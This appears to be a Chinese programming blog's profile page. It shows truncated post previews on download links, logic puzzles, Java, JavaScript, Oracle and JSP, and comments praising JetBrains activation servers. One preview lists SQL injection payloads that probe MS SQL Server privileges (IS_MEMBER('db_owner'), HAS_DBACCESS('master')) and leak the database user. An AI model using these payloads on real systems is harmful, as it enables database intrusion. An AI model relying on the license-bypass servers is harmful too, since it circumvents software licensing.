- 浏览: 4911436 次
- 性别:
- 来自: 上海
最新评论
-
taoshengyijiuzt:
感谢大佬!!!
JetBrains最新激活服务器(长期更新ing) -
masuweng:
激活码可以用
JetBrains最新激活服务器(长期更新ing) -
dusdong:
都失效了
JetBrains最新激活服务器(长期更新ing) -
追风筝的孩纸Zz:
dddddddddddddddd
js获取网页屏幕可见区域高度 -
自己811005:
88350bcf69dcfbda7f8a76a589d9054 ...
Js设置前端允许跨域请求后端API:Access-Control-Allow-Credentials
文章列表
http://ubuntu.srt.cn/ubuntu-releases//kubuntu/maverick/kubuntu-10.10-desktop-i386.iso
http://ubuntu.srt.cn/ubuntu-releases//maverick/ubuntu-10.10-desktop-i386.iso
thunder://QUFodHRwOi8vNTEuZHVvdGUub3JnL2h5cXFqZC56aXBaWg==
http://download.tuxfamily.org/notepadplus/5.8.5/npp.5.8.5.Installer.exe
thunder://QUFodHRwOi8vd3d3Lm15ZmlsZXMuY29tLmNuL2NvdW50L2Rvd25sb2FkLmFzcHg/aWQ9NDI3OTAmdXJsPWZ0cDovL2ZpbGUuZHJpdmVycy5jb20uY246MjIvTWVkaWEvUFBMaXZlTm9BRF92MTQxLnJhclpa
http://124.243.212.17/download/6003275/7525295/1/zip/99/64/1288982505827_832/FFSetup260.zip
http://gd.tuwien.ac.at/db/mysql/Downloads/MySQL-Cluster-7.1/mysql-cluster-gpl-noinstall-7.1.9a-win32.zip
最新版mysql下载
ftp://gd.tuwien.ac.at/db/mysql/Downloads/MySQL-5.1/mysql-5.1.53-win32.msi
2010年11月28日22:44:06
Download Java SE Development Kit 6u22 for Windows, Multi-language
Download Information and Files
Get the latest Java Runtime Environment to use Sun Download Manager
Internet Explorer Users: Check the top of this page for a "Java(TM) Web Start ActiveX Control" message in the inform ...
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
数字类型
and char(124)%2Buser%2Bchar(124)=0
字 ...
1、有两根不均匀分布的香,香烧完的时间是一个小时,你能用什么方法来确定一段15分钟的时间?
答:把两根香同时点起来,第一支香两头点着,另一支香只烧一头,等第一支香烧完的同时(这是烧完总长度的3/4),把第二支香另一头点燃,另一头从燃起到熄灭的时间就是15分!
2、一个经理有三个女儿,三个女儿的年龄加起来等于13,三个女儿的年龄乘起来等于经理自己的年龄,有一个下属已知道经理的年龄,但仍不能确定经理三个女儿的年龄,这时经理说只有一个女儿的头发是黑的,然后这个下属就知道了经理三个女儿的年龄。请问三个女儿的年龄分别是多少?为什么?
答:三女的年龄应该是2、2、9,经理36。因为只有 ...
在JAVA的util包中有两个所有集合的父接口Collection和Map,它们的父子关系:
java.util
+Collection 这个接口extends自 --java.lang.Iterable接口
+List 接口
-ArrayList 类
...
<script language="javascript">
function ff(){
//var a=document.getElementById("user").value; //方法1
// user 是指:<input id='user' name="user1" type="text" onblur="ff()"> 中的ID ~~id='user'
//var a=document.form.user1.value; //方法2 ...
oracle中substr函数的用法
In oracle/PLSQL, the substr functions allows you to extract a substring from a string.
The syntax for the substr function is:
substr( string, start_position, [ length ] )
说明:
string is the source string.
start_position is the position for extraction. The first position ...
[size=xx-small]jsp内置动作: jsp:include:在页面被请求的时候引入一个文件。 jsp:useBean:寻找或者实例化一个JavaBean。 jsp:setProperty:设置JavaBean的属性。 jsp:getProperty:输出某个JavaBean的属性。 jsp:forward:把请求转到一个新的页面。 jsp:plugin:根据浏览器类型为Java插件生成OBJECT或EMBED标记。 jsp内置对象: request 用户端请求,此请求会包含来自GET/POST请求的参数 response 网页传回用户端的回应 pageContext 网页的属性是在这 ...